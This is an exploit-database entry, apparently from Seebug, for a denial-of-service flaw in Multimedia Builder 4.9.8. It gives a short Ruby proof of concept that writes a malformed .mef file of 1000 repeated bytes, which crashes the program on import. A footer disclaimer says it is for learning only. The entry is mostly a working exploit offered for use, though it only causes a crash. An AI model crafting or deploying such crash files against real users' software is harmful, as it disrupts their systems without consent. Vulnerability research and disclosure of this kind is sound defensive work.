Multimedia Builder 4.9.8 Malicious mef File Denial of service =================================================================================== # Exploit Title:Multimedia Builder 4.9.8 Malicious mef File Denial of service # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # Website: www.infosec4all.tk # version: 4.9.8 # Category: DOS # Tested on: windows XP SP3 =================================================================================== ########################################DESC#################################################### #Multimedia Builder 4.9.8 Malicious mef File Denial of service vulnerability ,when opening a # #malicious .mef file. # #To trigger the exploit , go to file->MEF Import ->load MEF # # ################################################################################################ #!/usr/bin/ruby File.open "crash.mef" , "w" do |file| crash = "\x41" * 1000 file.write crash end
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论